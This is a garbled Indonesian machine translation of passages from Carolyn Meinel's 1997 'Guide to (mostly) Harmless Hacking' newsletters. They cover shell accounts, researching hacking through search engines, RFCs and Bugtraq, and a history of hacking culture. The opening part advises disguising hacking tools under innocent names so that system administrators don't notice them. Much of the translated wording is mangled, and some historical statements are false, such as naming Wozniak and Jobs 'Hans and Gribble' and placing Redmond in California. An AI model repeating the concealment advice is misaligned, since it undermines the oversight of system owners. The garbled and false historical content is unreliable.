lihat, selanjutnya mereka akan melakukannya
mencari-cari file program Anda.
Salah satu solusi untuk masalah ini adalah memberikan alat hacker jahat Anda nama yang tidak berbahaya. Misalnya, Anda bisa
ganti nama SATAN menjadi ANGEL. Tetapi sysdamin Anda dapat mencoba menjalankan program Anda untuk melihat apa yang
mereka lakukan. Jika ada
program Anda ternyata biasa digunakan untuk melakukan kejahatan komputer, Anda adalah sejarah.
Tunggu, tunggu, katamu. Mengapa mendapatkan akun shell jika saya dapat dikeluarkan bahkan untuk hukum, tidak berbahaya
peretasan? Bagaimanapun, Setan adalah sah untuk digunakan. Bahkan, Anda bisa belajar banyak hal rapi dengan Setan.
Kebanyakan peretas
alat-alat, bahkan jika mereka terutama digunakan untuk melakukan kejahatan, juga bersifat mendidik. Tentunya jika Anda ingin
menjadi
suatu sysadmin suatu hari nanti Anda perlu mempelajari cara kerja program-program ini.
Huh, kamu bisa belajar kebenaran. Akun Shell adalah sejenis roda pelatihan peretas. Mereka OK untuk
barang pemula. Tetapi untuk menjadi peretas yang serius, Anda juga harus menemukan ISP yang dijalankan oleh peretas
terima kamu dan biarkan kamu melakukan segala macam hal mencurigakan tepat di bawah hidung mereka. Ya, tentu. Atau Anda
dapat menginstal
beberapa bentuk Unix di komputer di rumah Anda. Tapi itu Panduan lain untuk (kebanyakan) Hacking Berbahaya (Vol. 2
Nomor 2: Linux!).
Jika Anda memiliki Unix di komputer di rumah dan menggunakan koneksi PPP untuk masuk ke Internet, ISP Anda
jauh lebih kecil kemungkinannya untuk mengintip Anda. Atau coba berteman dengan sysadmin Anda dan jelaskan siapa Anda
perbuatan. Siapa tahu, Anda mungkin akhirnya bekerja untuk ISP Anda!
Sementara itu, Anda dapat menggunakan akun shell Anda untuk berlatih apa saja yang Unixy tidak lakukan
sysadmin pergi balistik.
************************************************ **********
Apakah Anda ingin akun shell yang menjalankan kekuatan industri Linux - tanpa ada perintah yang disensor? Ingin
dapat melihat tabel router, port surf all.net, dan simpan SETAN di direktori home Anda tanpa
diusir karena dicurigai melakukan peretasan? Apakah Anda ingin dapat telnet di pada ssh (secure shell) jadi tidak
seseorang dapat mengendus kata sandi Anda? Apakah Anda bersedia membayar $ 30 per bulan untuk akses tak terbatas ke r hack
ini
tempat bermain? Bagaimana dengan akun uji coba gratis tujuh hari? Email haxorshell@techbroker.com untuk detailnya.
************************************************ **********
Jika Anda bertanya-tanya tentang semua input dari jericho dalam Panduan ini, ya, dia cukup membantu
meninjau ini dan membuat saran. Jericho adalah konsultan keamanan dan juga menjalankan host Internet sendiri,
obscure.sekurity.org. Terima kasih, jericho@dimensional.com, dan selamat melakukan peretasan!
_________________________________________________________
Berlangganan ke daftar diskusi kami dengan mengirim email ke hacker@techbroker.com dengan pesan "berlangganan"
Ingin berbagi kewl stuph dengan daftar Happy Hacker? Kesalahan yang benar? Kirim pesan Anda ke
hacker@techbroker.com. Untuk mengirim saya email rahasia (harap, tidak ada diskusi tentang kegiatan ilegal) gunakan
cmeinel@techbroker.com dan pastikan untuk menyatakan dalam pesan Anda bahwa Anda ingin saya merahasiakannya. Jika
Anda ingin pesan Anda diposting secara anonim, tolong katakan begitu! Nyala api langsung ke dev/null@techbroker.com.
Selamat melakukan peretasan!
Hak Cipta 1997 Carolyn P. Meinel. Anda dapat meneruskan atau memposting PANDUAN ini kepada (kebanyakan)
HARMLESS
HACKING di situs Web Anda selama Anda meninggalkan pemberitahuan ini di akhir.
________________________________________________________
Halaman 41
___________________________________________________________
PANDUAN UNTUK (kebanyakan) HACKING HARMLESS
Nomor Seri Pemula 4
Cara menggunakan Web untuk mencari informasi tentang peretasan.
GTMHH ini mungkin berguna bahkan untuk Uberhackers (oh, tidak, nyala api!)
____________________________________________________________
Ingin menjadi sangat, sangat tidak populer? Coba ajukan terlalu banyak pertanyaan kepada teman peretas Anda
menyortir.
Tapi, bagaimana kita tahu pertanyaan yang salah? OKE, saya bersimpati dengan masalah Anda
karena saya sering dinyalakan. Itu sebagian karena saya dengan tulus percaya dalam mengajukan pertanyaan bodoh. aku
membuat
hidupku mengajukan pertanyaan bodoh. Orang membayar saya banyak uang untuk pergi ke konferensi, menelepon orang di
telepon dan nongkrong di grup berita Usenet yang mengajukan pertanyaan bodoh sehingga saya bisa menemukan barang untuk
mereka. Dan,
coba tebak, kadang-kadang pertanyaan paling bodoh memberi Anda jawaban terbaik. Jadi itu sebabnya kamu tidak melihatku
membakar orang-orang yang mengajukan pertanyaan bodoh.
************************************************ ******
Catatan untuk pemula: Pernahkah Anda terlalu takut untuk mengajukan pertanyaan bodoh, "Apa itu nyala?" Sekarang Anda bisa
menemukannya
di luar! Ini adalah sekelompok ocehan menjengkelkan dan ocehan yang dibuat dalam email atau posting Usenet oleh beberapa
orang idiot yang
berpikir dia membuktikan superioritas mentalnya melalui penggunaan bahasa kotor dan / atau tidak sopan seperti itu
sebagai "Anda menderita inversi rektokranial," f *** y ***, d ****, b ****, dan tentu saja @ # $% ^ & *! Ini
catatan newbie adalah nyala api saya terhadap para flamers yang sangat superior bagi saya.
************************************************ ******
Tetapi meskipun pertanyaan bodoh bisa baik untuk ditanyakan, Anda mungkin tidak menyukai nyala api yang dijatuhkan pada
Anda.
Jadi, jika Anda ingin menghindari api, bagaimana Anda mengetahui jawabannya sendiri?
Panduan ini mencakup satu cara untuk mengetahui informasi peretasan tanpa harus mengajukan pertanyaan kepada orang: oleh
berselancar di web. Cara lain adalah dengan membeli banyak dan banyak manual komputer, tetapi itu membutuhkan banyak
uang.
Juga, di beberapa bagian dunia sulit untuk mendapatkan manual. Untungnya, bagaimanapun, hampir apa pun yang Anda
ingin belajar tentang komputer dan komunikasi tersedia secara gratis di suatu tempat di Web.
Pertama, mari pertimbangkan mesin pencari Web. Beberapa hanya membantu Anda mencari di Web itu sendiri. Tetapi yang lain
memungkinkan
Anda mencari newsgroup Usenet yang telah diarsipkan selama bertahun-tahun yang lalu. Juga, email peretas terbaik
daftar juga diarsipkan di Web.
Ada dua pertimbangan utama dalam menggunakan mesin pencari Web. Salah satunya adalah apa yang digunakan mesin pencari,
dan
lainnya adalah taktik pencarian sendiri.
Saya telah menggunakan banyak mesin pencari Web. Tapi akhirnya saya sampai pada kesimpulan bahwa untuk penelitian serius,
Anda hanya perlu dua: Alavista (http://altavista.digital.com) dan Dejanews (http://www.dejanews.com).
Altavista adalah yang terbaik untuk Web, sementara Dejanews adalah yang terbaik untuk mencari grup berita Usenet. Tapi jika
Anda tidak ingin membawa saya pada kata saya, Anda dapat menjelajahi situs dengan tautan ke hampir semua Web dan
Newsgroup search engine di http://sgk.tiac.net/search/.
Tetapi bagaimana Anda secara efisien menggunakan mesin pencari ini? Jika Anda meminta mereka untuk menemukan "hacker"
atau bahkan "bagaimana caranya"
hack, "Anda akan mendapatkan bazillions situs Web dan posting grup berita untuk dibaca. OK, sehingga Anda berselancar
dengan susah payah
satu situs web peretas demi satu. Anda mendapatkan musik organ yang terdengar mengerikan, tengkorak dengan mata merah
bergulir,
api animasi menyala, dan setiap situs memiliki tautan ke situs lain dengan musik yang megah dan tidak sesuai tata bahasa
membual tentang "Saya 31337, d00dz !!! Saya sangat * && ^% $ pandai dalam peretasan, Anda harus sujud dan cium saya

Halaman 42
$% ^ && *! "Tetapi entah bagaimana mereka tampaknya tidak memiliki informasi aktual. Hei, selamat datang di wannabe
dunia hacker!
Anda perlu mencari tahu beberapa kata yang membantu mesin pencari pilihan Anda mendapatkan hasil yang lebih bermanfaat.
Untuk
Sebagai contoh, katakanlah Anda ingin mengetahui apakah saya, Supreme R00ler dari dunia Happy Hacker, adalah seorang elit
cewek hacker atau hanya masalah sulit. Sekarang pendekatan luser hanya dengan pergi ke http://www.dejanews.com
dan lakukan pencarian di grup berita Usenet untuk "Carolyn Meinel," pastikan untuk mengklik tombol "lama" untuk membawa
hal-hal dari tahun lalu. Tetapi jika Anda melakukannya, Anda mendapatkan daftar posting yang sangat panjang ini, yang
sebagian besar dimiliki
tidak ada hubungannya dengan peretasan:
CDMA vs GSM - carolyn meinel <cmeinel@unm.edu> 1995/11/17
Re: Oktober El Nino-Southern Oscillation info gonthier@usgs.gov (Gerard J. Gonthier) 1995/11/20
Perihal: Perang Internasional MrGlucroft@psu.edu (The Reaver) 1995/11/30
shirkahn@earthlink.net (Christopher Proctor) 1995/12/16
Re: Lyndon LaRouche - siapa dia? lness@ucs.indiana.edu (lester john ness) 1996/01/06
Data observasi Indeks Warna UB - cmeinel@nmia.com (Carolyn P. Meinel) 1996/05/13
Re: Penipuan Mars? Sejarah seorang ilmuwan melibatkan gksmiley@aol.com (GK Smiley) 1996/08/11
Re: Pengumuman Kehidupan Mars: TANPA Masalah Penipuan twitch@hub.ofthe.net 1996/08/12
Hacker Helper E-Zine ingin - rcortes@tuna.hooked.net (Raul Cortes) 1996/12/06
Carolyn Meinel, Sooooooper Genius - nobody@cypherpunks.ca (John Anonymous MacDonald, seorang remailer
simpul) 1996/12/12
Bagaimanapun, daftar ini berjalan terus dan terus.
Tetapi jika Anda menentukan "Carolyn Meinel hacker" dan klik "semua" alih-alih "apa pun" pada tombol "Boolean", Anda
dapatkan daftar yang dimulai dengan:
Media: "Unamailer menyampaikan kesedihan Natal" -Mannella@ipifidpt.difi.unipi.it (Riccardo Mannella) 1996/12/30
Cu Digest, # 8.93, Sel 31 Des 96 - Cu Digest (tk0jut2@mvs.cso.niu.edu)
<TK0JUT2@MVS.CSO.NIU.EDU> 1996/12/31
Wawancara RealAudio dengan Happy Hacker - bmcw@redbud.mv.com (Brian S. McWilliams) 1997/01/08
Dll
Dengan cara ini semua posting tentang kehidupan membosankan saya di dunia sains tidak muncul, hanya peretas yang berair
barang.
Sekarang anggaplah semua yang ingin Anda lihat adalah api tentang betapa jahatnya saya. Anda bisa membawanya ke
bagian atas daftar dengan menambahkan (dengan tombol "semua" masih menyala) "nyala" atau "b ***" atau "b ****" dengan
hati-hati mengeja
mengeluarkan kata-kata buruk itu alih-alih membujuk mereka dengan **** s. Sebagai contoh, pencarian di "Carolyn Meinel
hacker
nyala "dengan Boolean" semua "hanya muncul satu posting. Buku penting ini mengatakan daftar Happy Hacker adalah
mengerikan
contoh dari apa yang terjadi ketika kita memodohi tipe moderator menyensor kata-kata nakal dan kecaman tidak waras.
****************************************

Halaman 43
Catatan pemula: "Boolean" adalah istilah matematika. Di mesin pencari Dejanews mereka pikir pengguna tidak punya
petunjuk tentang apa artinya "Boolean" sehingga mereka memberi Anda pilihan "apa saja" atau "semua" dan kemudian beri label
"Boolean" jadi
Anda merasa bodoh jika Anda tidak memahaminya. Tetapi dalam aljabar Boolean nyata kita dapat menggunakan operator "dan"
"atau"
dan "tidak" pada pencarian kata (atau pencarian set). "Dan" berarti Anda akan memiliki pencarian yang muncul
hanya item yang memiliki "semua" istilah yang Anda tentukan; "atau" berarti Anda akan melakukan pencarian yang
menghasilkan "apa saja"
ketentuan. Operator "tidak" akan mengecualikan item yang termasuk istilah "tidak" meskipun mereka memiliki atau
semua istilah pencarian lainnya. Altavista memiliki aljabar Boolean nyata di bawah opsi pencarian "lanjutan".
****************************************
Tapi mari kita lupakan semua mesin pencari Web itu sebentar. Menurut pendapat saya yang sederhana namun kuno, yang terbaik
cara untuk mencari di Web adalah menggunakannya persis seperti yang diinginkan oleh penemunya, Tim Berners-Lee. Anda
mulai dari
tempat yang bagus dan kemudian ikuti tautan ke situs terkait. Bayangkan itu!
Ini satu lagi tip kabut lama saya. Jika Anda ingin benar-benar jagoan di Web, dan jika Anda memiliki shell
akun, Anda dapat melakukannya dengan program lynx. Saat diminta, ketik saja "lynx diikuti oleh URL yang Anda inginkan
untuk mengunjungi. Karena lynx hanya menampilkan teks, Anda tidak perlu membuang waktu menunggu musik organ, animasi
tengkorak dan JPEG porno untuk dimuat.
Jadi, di mana tempat yang baik untuk memulai? Cukup jelajahi situs Web yang tercantum di bagian akhir Panduan ini. Tidak
hanya
apakah mereka membawa arsip Panduan ini, mereka membawa banyak informasi berharga lainnya untuk peretas pemula,
serta tautan ke situs berkualitas lainnya. Favorit saya adalah http://www.cs.utexas.edu/users/matt/hh.html dan
http://www.silitoad.org
Peringatan: saran orang tua disarankan. Anda akan melihat beberapa titik awal yang bagus di tempat lain dalam Panduan ini,
terlalu.
Selanjutnya, pertimbangkan salah satu pertanyaan paling umum yang saya dapatkan: "Bagaimana cara masuk ke komputer ?????
:( :("
Tanyakan ini pada seseorang yang bukan wanita tua yang sangat baik seperti saya dan Anda akan mendapatkan reaksi yang
benar-benar kasar. Ini dia
Mengapa. Dunia ini penuh dengan berbagai jenis komputer yang menjalankan berbagai jenis perangkat lunak pada berbagai jenis
jaringan. Bagaimana Anda masuk ke komputer tergantung pada semua hal ini. Jadi, Anda perlu belajar secara menyeluruh a
sistem komputer sebelum Anda berpikir tentang merencanakan strategi untuk masuk ke dalamnya. Itu salah satu alasannya
membobol komputer secara luas dianggap sebagai puncak peretasan. Jadi, jika Anda tidak menyadari ini
banyak, Anda perlu melakukan banyak pekerjaan rumah sebelum Anda bahkan dapat bermimpi membobol komputer.
Tapi, OK, saya akan berhenti menyembunyikan rahasia pemutusan dan entri komputer universal. Periksa:
Arsip Bugtraq: http://geek-girl.com/bugtraq
Arsip Bugtraq NT: http://ntbugtraq.rc.on.ca/index.html
************************************************ *
Anda bisa masuk penjara peringatan: Jika Anda ingin mengambil olahraga membobol komputer, Anda harus melakukannya
itu dengan komputer Anda sendiri, atau dapatkan izin dari pemilik jika Anda ingin membobol orang lain
komputer. Kalau tidak, Anda melanggar hukum. Di AS, jika Anda membobol komputer yang melintasi negara
baris dari tempat Anda meluncurkan serangan Anda, Anda melakukan kejahatan Federal. Jika Anda lintas nasional
batas untuk meretas, ingat bahwa sebagian besar negara memiliki perjanjian yang memungkinkan mereka mengekstradisi para
penjahat
negara masing-masing.
************************************************ *
Tunggu sebentar, jika Anda menjelajahi situs tersebut, Anda tidak akan langsung menjadi Ubercracker. Kecuali kamu
sudah merupakan programmer yang sangat baik dan berpengetahuan luas di Unix atau Windows NT, Anda akan menemukan
informasi di kedua situs ini akan * TIDAK * langsung memberi Anda akses ke komputer korban yang mungkin Anda miliki
memilih. Ini tidak semudah itu. Anda harus belajar cara memprogram. Pelajari setidaknya satu operasi
sistem luar dan dalam.

Halaman 44
Tentu saja beberapa orang mengambil jalan pintas ke peretasan. Mereka mendapatkan teman mereka untuk memberi mereka
banyak
program pembobolan dalam kaleng. Kemudian mereka mencobanya di satu komputer demi satu sampai mereka tersandung ke
dalam root
dan secara tidak sengaja menghapus file sistem. Mereka tertangkap dan lari ke Electronic Freedom Foundation dan
mengeluh tentang bagaimana FBI menganiaya mereka.
Jadi, apakah kamu serius? Apakah Anda * benar-benar * ingin menjadi hacker yang cukup buruk untuk mempelajari sistem
operasi di dalamnya
dan keluar? Apakah Anda * benar-benar * ingin mengisi waktu bermimpi Anda dengan protokol komunikasi misterius
topik? Cara kuno, dan super mahal adalah membeli dan mempelajari banyak manual. <Mode geek aktif>
Dengar, aku benar-benar percaya pada manual. Saya menghabiskan sekitar $ 200 per bulan untuk mereka. Saya membacanya di
kamar mandi,
sambil duduk dalam kemacetan lalu lintas, dan sambil menunggu janji dengan dokter. Tetapi jika saya di meja saya, saya lebih
suka membaca
manual dan dokumen teknis lainnya dari Web. Selain itu, barang-barang Web gratis! <Mode geek mati>
Sumber daya Web paling fantastis untuk calon geek, hacker, adalah RFC. RFC adalah singkatan dari "Request for
Komentar. "Sekarang ini kedengarannya tidak lebih dari sebuah kelompok diskusi. Tetapi sebenarnya RFC adalah definitif
dokumen yang memberi tahu Anda bagaimana Internet bekerja. Nama lucu "RFC" berasal dari sejarah kuno ketika
banyak orang yang mendiskusikan bagaimana cara agar ARPAnet berfungsi. Tetapi saat ini RFC berarti
"Kebenaran Injil tentang Cara Kerja Internet" alih-alih "Hai Teman, Ayo Bicarakan Hal Ini."
************************************************ ******
Catatan pemula: ARPAnet adalah percobaan Badan Penelitian Proyek Lanjutan AS yang diluncurkan pada tahun 1969 itu
berevolusi menjadi Internet. Ketika Anda membaca RFC Anda akan sering menemukan referensi ke ARPAnet dan ARPA - atau
terkadang DARPA. "D" itu singkatan dari "pertahanan." DARPA / ARPA terus mengubah namanya
antara keduanya. Misalnya, ketika Bill Clinton menjadi Presiden AS pada tahun 1993, ia mengubah DARPA kembali
untuk ARPA karena "pertahanan" adalah Hal yang Buruk. Kemudian pada tahun 1996 Kongres AS mengeluarkan undang-
undang yang mengubahnya kembali
DARPA karena "pertahanan" adalah Good Thing.
************************************************ ******
Sekarang idealnya Anda cukup membaca dan menghafal semua RFC. Tetapi ada zillions RFC dan beberapa
kita perlu meluangkan waktu untuk makan dan tidur. Jadi bagi kita tanpa kenangan fotografi dan sekumpulan gratis
waktu perlu selektif tentang apa yang kita baca. Jadi bagaimana kita menemukan RFC yang akan menjawab apa pun milik kita
pertanyaan bodoh terbaru?
Satu tempat awal yang baik adalah daftar lengkap semua RFC dan judulnya di ftp://ftp.tstt.net.tt/pub/inet/rfc/rfc-
indeks. Meskipun ini adalah situs ftp (file transfer protocol), Anda dapat mengaksesnya dengan browser Web Anda.
Atau, bagaimana dengan RFC di RFC! Itu benar, RFC 825 "dimaksudkan untuk memperjelas status RFC dan
memberikan beberapa panduan untuk penulis RFC di masa depan. Dalam arti tertentu adalah spesifikasi untuk RFC. "Untuk
temukan RFC ini, atau bahkan RFC mana pun yang Anda miliki angkanya, buka saja Altavista dan cari "RFC
825 "atau berapa pun angkanya. Pastikan untuk menuliskannya dalam tanda kutip seperti contoh ini untuk mendapatkan yang
terbaik
hasil.
Wah, RFC ini bisa sangat sulit dimengerti! Heck, bagaimana kita tahu RFC mana yang harus dibaca
jawaban atas pertanyaan kami? Coba tebak, ada solusi, kelompok RFC menarik yang disebut "FYIs" Alih-alih
daripada menentukan apa pun, FYI hanya membantu menjelaskan RFC lainnya. Bagaimana Anda mendapatkan FYI? Mudah!
Saya hanya
berselancar ke RFC di FYIs (1150) dan mengetahui bahwa:
FYI dapat diperoleh melalui FTP dari NIC.DDN.MIL, dengan pathname FYI: mm.TXT, atau RFC: RFCnnnn.TXT
(di mana "mm" mengacu pada jumlah FYI dan "nnnn" mengacu pada jumlah RFC). Login dengan FTP,
username ANONYMOUS dan kata sandi TAMU. NIC juga menyediakan layanan surat otomatis untuk mereka
situs yang tidak dapat menggunakan FTP. Alamat permintaan ke SERVICE@NIC.DDN.MIL dan di bidang subjek
pesan menunjukkan nomor FYI atau RFC, seperti pada "Subjek: FYI mm" atau "Subjek: RFC nnnn".

Halaman 45
Tetapi yang lebih baik dari ini adalah seperangkat RFC terorganisir yang di-hyperlink bersama di Web pada
http://www.FreeSoft.org/Connected/. Saya bahkan tidak bisa mulai menjelaskan kepada Anda betapa indahnya situs ini. Kamu
hanya harus mencobanya sendiri. Memang itu tidak mengandung semua RFC. Tetapi memiliki tutorial dan pemula
serangkaian tautan ramah melalui RFC paling penting.
Terakhir, Anda dapat memeriksa dua situs yang menawarkan banyak informasi teknis di komputer
keamanan:
http://csrc.nist.gov/secpubs/rainbow/
http://GANDALF.ISU.EDU/security/security.html perpustakaan keamanan
Saya harap ini informasi yang cukup untuk membuat Anda sibuk belajar selama lima atau sepuluh tahun ke depan. Tapi tolong
simpan
ini dalam pikiran. Terkadang tidak mudah untuk menemukan sesuatu hanya dengan membaca sejumlah besar teknis
informasi. Terkadang itu bisa menyelamatkan Anda dari banyak kesedihan hanya untuk mengajukan pertanyaan. Bahkan
pertanyaan bodoh. Hei, bagaimana
apakah Anda ingin memeriksa situs Web untuk kita yang mencari nafkah meminta orang bodoh
pertanyaan? Berselancar ke http://www.scip.org. Itu adalah halaman muka Society of Competitive
Informasi Profesional, organisasi rumah untuk orang-orang seperti saya. Jadi, silakan, buatlah hari seseorang. Memiliki
Phun menanyakan pertanyaan bodoh itu. Hanya ingat untuk tahan api ponsel dan komputer Anda terlebih dahulu!
PANDUAN UNTUK (kebanyakan) HACKING HARMLESS
Nomor Seri Pemula 5
Peretasan komputer. Di mana ia mulai dan bagaimana itu tumbuh?
____________________________________________________________
Jika Anda bertanya-tanya bagaimana rasanya di hari-hari dahulu, sepuluh, dua puluh, tiga puluh tahun yang lalu, bagaimana
dengan membiarkan dan wanita tua
memberi tahu Anda seperti dulu.
Di mana kita akan mulai? Tujuh belas tahun yang lalu dan Konvensi Fiksi Ilmiah Dunia di Boston,
Massachusetts? Saat itu World Cons adalah hal terdekat yang kami miliki dengan konvensi peretas.
Gambar 1980. Ted Nelson berkeliling dengan teman-temannya Xanadu: Roger Gregory, H. Keith Henson (sekarang
berperang melawan para Ilmuwan) dan K. Eric Drexler, kemudian membangun Foresight Institute. Mereka bermimpi
menciptakan apa yang menjadi World Wide Web. Saat ini orang-orang di kontra hacker mungkin berpakaian seperti
vampir. Pada 1980 mereka memakai topi baseball hitam identik dengan sayap perak dan slogan: "Xanadu: sayap
pikiran. "Orang lain di World Con sedikit lebih bawah tanah: melakukan obat bius, menjual pijat, tinju biru
saluran telepon. Staf hotel harus menutup kolam renang untuk menghentikan pesta pora seks.
Oh, tapi ini bukan awal dari peretasan. Mari kita lihat area Boston tujuh belas tahun lagi
kembali, awal 60-an. Siswa MIT sedang berjuang untuk mengendalikan komputer mainframe sekolah. Mereka menggunakan
program bahasa mesin yang masing-masing berusaha untuk menghapus semua program lain dan menguasai pusat
unit pengolahan. Saat itu tidak ada komputer pribadi.
Pada tahun 1965, Ted Nelson, yang kemudian menjadi pemimpin geng Xanadu berkepala perak di Worldcon 1980,
pertama koin kata "hypertext" untuk menggambarkan apa yang suatu hari nanti akan menjadi World Wide Web. Nelson nanti
menyebarkan Injil dalam bukunya Literacy Online. Penutup belakang menunjukkan sosok tipe Superman terbang dan
semboyan "Anda dapat dan harus belajar menggunakan komputer sekarang."
Tetapi pada tahun 1965 komputer secara luas ditakuti sebagai sumber kekuatan Orwellian. Ya, seperti di George Orwell
novel menyenangkan, "1984," yang meramalkan masa depan di mana teknologi akan menghancurkan semua kebebasan manusia.
Beberapa
sedang mendengarkan Nelson. Sedikit yang melihat gelombang anarki bebas-semangat yang sudah dilepaskan oleh budaya
hacker.
Tapi putri guru LSD, Timothy Leary, Susan, mulai belajar pemrograman komputer.

Halaman 46
Sekitar tahun 1966, Robert Morris Sr, ilmuwan kepala NSA di masa depan, memutuskan untuk bermutasi dari perang peretas
awal ini
ke lingkungan "peretasan aman" pertama. Dia dan dua teman yang menulis kode itu menyebut permainan mereka "Darwin."
Kemudian
"Darwin" menjadi "Perang Inti," sebuah permainan komputer bentuk-bebas yang dimainkan hingga hari ini oleh sebagian dari
yang paling pintar
uberhackers.
Mari kita melompat ke tahun 1968 dan aroma gas air mata. Wow, lihat batu-batu yang dilemparkan melalui jendela
membangun ilmu komputer di University of Illinois di Urbana-Champaign! Di luar adalah 60-an antiwar
pengunjuk rasa. Musuh mereka, mereka percaya, adalah komputer yang didanai ARPA kampus. Di dalamnya nerdz tinggi
kafein dan dinitrogen oksida. Di bawah arahan Roger Johnson muda, mereka bersatu bersama empat CDC
6400-an dan menautkannya dengan 1024 terminal grafik vektor bisu. Ini menjadi realisasi pertama
ruang maya: Plato.
1969 ternyata menjadi tahun paling penuh pertanda untuk peretasan.
Pada tahun itu Badan Proyek Penelitian Lanjutan Departemen Pertahanan mendanai proyek kedua untuk dihubungkan
empat komputer mainframe sehingga peneliti dapat membagikan sumber dayanya. Sistem ini tidak membanggakan vektor
grafis dari sistem Plato. Terminal-terminalnya hanya menampilkan karakter ASCII: huruf dan angka. Membosankan, ya?
Tetapi ARPAnet ini benar-benar dapat diretas. Dalam setahun, penggunanya meretas bersama cara baru untuk mengirim file teks
sekitar. Mereka menyebut penemuan mereka "email" yang tidak sah dan tidak terencana. ARPAnet telah mengembangkan
kehidupan
independen dari penciptanya. Ini adalah kisah yang nantinya akan terulang dalam berbagai bentuk. Tidak ada yang bisa
mengendalikan
ruang maya. Mereka bahkan tidak bisa mengendalikannya ketika hanya empat komputer besar.
Juga pada tahun 1969 John Goltz bekerja sama dengan orang uang untuk menemukan Compuserve menggunakan paket baru
yang diaktifkan
teknologi yang dipelopori oleh ARPAnet. Juga pada tahun 1969 kita melihat kelahiran yang luar biasa di Bell Labs sebagai Ken
Thompson menciptakan sistem operasi baru: Unix. Ini akan menjadi standar emas peretasan dan
Internet, sistem operasi dengan kekuatan untuk membentuk keajaiban legerdemain komputer.
Pada tahun 1971, Abbie Hoffman dan Yippies menemukan majalah hacker / phreaker pertama, YIPL / TAP (Pemuda
Pihak Internasional - Program Bantuan Teknis). YIPL / TAP pada dasarnya menciptakan phreaking - olahraga
bermain dengan sistem telepon dengan cara yang tidak pernah diinginkan pemiliknya. Mereka termotivasi oleh Bell
Monopoli telepon dengan tarif jarak jauh yang tinggi, dan pajak besar yang ditolak oleh Hoffman dan banyak lainnya
untuk membayar sebagai protes mereka terhadap Perang Vietnam. Apa cara yang lebih baik untuk tidak membayar pajak telepon
daripada membayar tidak
tagihan telepon sama sekali?
Kotak biru meledak ke tempat kejadian. Osilator mereka mengotomatiskan suara siulan yang sudah diaktifkan
orang-orang seperti Kapten Crunch (John Draper) menjadi kapten bajak laut dari Bell Telephone
megamonopoli Tiba-tiba phreakers benar-benar dapat menghasilkan uang sesuai hobi mereka. Hans dan Gribble
menjajakan kotak biru di kampus Stanford.
Pada Juni 1972, majalah radikal kiri Ramparts, dalam artikel "Mengatur Perusahaan Telepon Di Anda
Home "menerbitkan skema untuk varian pada kotak biru yang dikenal sebagai" kotak bisu. "Artikel ini melanggar
California KUHP bagian 502.7, yang melarang penjualan "rencana atau instruksi untuk apa pun
instrumen, peralatan, atau perangkat yang dimaksudkan untuk menghindari biaya telepon tol. "Polisi California, dibantu oleh
Para pejabat Pacific Bell, menyita salinan majalah itu dari kios koran dan kantor majalah itu. Keuangan
Stres menyebabkan kebangkrutan dengan cepat.
Ketika Perang Vietnam berakhir, program simulator penerbangan pertama dalam sejarah dibuka di jaringan Plato.
Grafik komputer, hampir tidak pernah terdengar pada hari itu, ditampilkan oleh grafik vektor sentuhan-sensitif
terminal. Cyberpilots di seluruh AS memilih kerajinan mereka: Phantom, MIGs, F-104s, X-15, Sopwith
Unta. Pilot virtual terbang keluar dari bandara digital dan mencoba menembak jatuh satu sama lain dan saling membom
bandara. Saat menerbangkan Phantom, saya melihat pesan obrolan di bagian bawah layar saya. "Aku akan menembakmu
bawah. "Oh, tidak, MIG di ekor saya. Saya menyelam dan berbalik berharap untuk mendapatkan penyiksa saya ke pemandangan
saya. Layar

Halaman 47
menjadi hitam. Terminal saya menampilkan pesan "Anda baru saja menarik 37 Gs. Sekarang Anda lebih terlihat seperti pizza
daripada
manusia saat Anda perlahan bergetar ke Bumi. "
Suatu hari Starship Enterprise menerobos masuk ke dalam simulator kami, menembak jatuh semua orang dan menghilang
kembali
ruang maya. Plato telah diretas! Bahkan pada tahun 1973 pemain game multiuser harus khawatir tentang mendapatkan
"smurfed"! (Ketika seorang hacker membobol gim multi-pengguna di Internet dan membunuh pemain dengan teknik
yang bukan aturan main, ini disebut "smurfing.")
1975. Oh, tahun yang penuh berkah! Di bawah kontrak Angkatan Udara, di kota Albuquerque, New Mexico, Altair adalah
terlahir. Altair. Komputer mikro pertama. Bill Gates menulis sistem operasinya. Lalu ibu Bill membujuknya
untuk pindah ke Redmond, CA di mana dia memiliki sejumlah uang pria yang ingin melihat apa sistem operasi ini
semua tentang bisnis.
Ingat Hans dan Gribble? Mereka bergabung dengan klub Home Brew Computer dan memilih Motorola
mikroprosesor untuk membangun sendiri. Mereka mulai menjual komputer mereka, yang mereka beri nama Apple,
dengan nama asli mereka Steve Wozniak dan Steve Jobs. Agama komputer lahir.
Pertempuran Apple / Microsoft yang hebat bergabung. Kami para peretas tiba-tiba memiliki kotak-kotak yang mengalahkannya
Terminal Tektronix.
Pada tahun 1978, Ward Christenson dan Randy Suess menciptakan sistem papan buletin komputer pribadi pertama.
Segera, dihubungkan oleh tidak lebih dari jaringan telepon jarak jauh dan node papan buletin ini,
peretas membuat ruang dunia maya pribadi yang baru. Phreaking menjadi lebih penting dari sebelumnya untuk terhubung ke jauh
BBS.
Juga pada tahun 1978, jaringan komputer Source dan Compuserve mulai melayani pengguna individu.
"Naked Lady" merajalela di Compuserve. Cybercafe pertama, Planet Earth, dibuka di Washington, DC.
Jaringan X.25 memerintah tertinggi.
Lalu ada mutasi ARPAnet besar pada tahun 1980. Dalam lompatan raksasa itu bergerak dari Network Control Protocol
untuk Transmission Control Protocol / Internet Protocol (TCP / IP). Sekarang ARPAnet tidak lagi terbatas pada 256
komputer - dapat menjangkau puluhan juta host! Dengan demikian internet dikandung dalam rahim
DoD's ARPAnet. Kerangka kerja yang suatu hari nanti akan menyatukan para peretas di seluruh dunia adalah sekarang
diam-diam, tumbuh. Plato fades, selamanya terbatas pada 1024 terminal.
Penulis fiksi ilmiah terkenal Jerry Pournelle menemukan ARPAnet. Segera penggemarnya berkerumun untuk menemukan
alasan - atau apa pun - untuk masuk ke ARPAnet. Para administrator ARPAnet secara mengejutkan bersikap santai
pemberian akun, terutama kepada orang-orang di dunia akademik.
ARPAnet sakit di bagian belakang untuk digunakan, dan tidak mengirimkan visual pesawat tempur yang mencampurnya. Tapi
tidak seperti itu
Plato yang mewah, ARPAnet benar-benar dapat diretas dan sekarang memiliki apa yang diperlukan untuk tumbuh. Berbeda
dengan jaringan peretas
papan buletin, orang tidak perlu memilih antara panggilan telepon jarak jauh yang mahal atau menelepon
membuat koneksi mereka. Semuanya lokal dan gratis.
Pada tahun yang sama, 1980, "414 Gang" diserbu. Phreaking lebih berbahaya dari sebelumnya.
